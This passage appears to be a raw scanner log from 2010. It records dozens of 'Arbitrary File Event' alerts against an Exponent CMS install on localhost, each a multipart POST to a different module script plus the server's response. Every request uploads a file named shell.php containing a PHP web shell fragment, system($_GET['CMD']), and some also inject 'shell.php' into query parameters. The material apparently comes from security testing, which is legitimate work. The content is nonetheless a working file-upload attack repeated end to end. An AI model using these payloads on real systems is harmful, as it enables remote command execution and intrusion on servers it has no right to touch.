?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:52 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bots/bots/testbot.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:53 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bots/actions/activate_bot.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:53 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bots/actions/deactivate_bot.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:53 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bots/actions/manage_bots.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:53 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bots/actions/run_bot.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:53 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:54 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:54 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/delete_board.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:54 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/delete_post.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:54 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/edit_board.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:54 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/edit_post.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:55 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/edit_post.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:55 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/edit_rank.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:55 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/monitor_all_boards.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:55 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/monitor_board.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:56 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/monitor_thread.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:56 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/monitor_thread.php?action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:56 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/preview_post.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:56 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/save_board.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:56 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/save_post.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:57 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/save_rank.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:57 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/save_rank.php?ajax_action=shell.php&expid=shell.php&printerfriendly=shell.php&action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:57 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/view_admin.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:57 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/view_board.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:57 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/view_rank.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/view_rank.php?section=shell.php&action=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bbmodule/actions/view_thread.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/banner_click.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 302 Found Date: Fri, 08 Oct 2010 22:26:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=8a04914b75cd6237d6727bf095529389; expires=Sun, 16-Jan-2011 22:26:58 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http:// Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/banner_click.php?expid=shell.php&ajax_action=shell.php&id=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 302 Found Date: Fri, 08 Oct 2010 22:26:59 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=pmut2f4e89og8juf8f0amjo7n7; expires=Sun, 16-Jan-2011 22:26:59 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http:// Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:59 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/deps.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:59 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:26:59 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/actions/ad_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:00 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/bannermodule/actions/ad_edit.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: 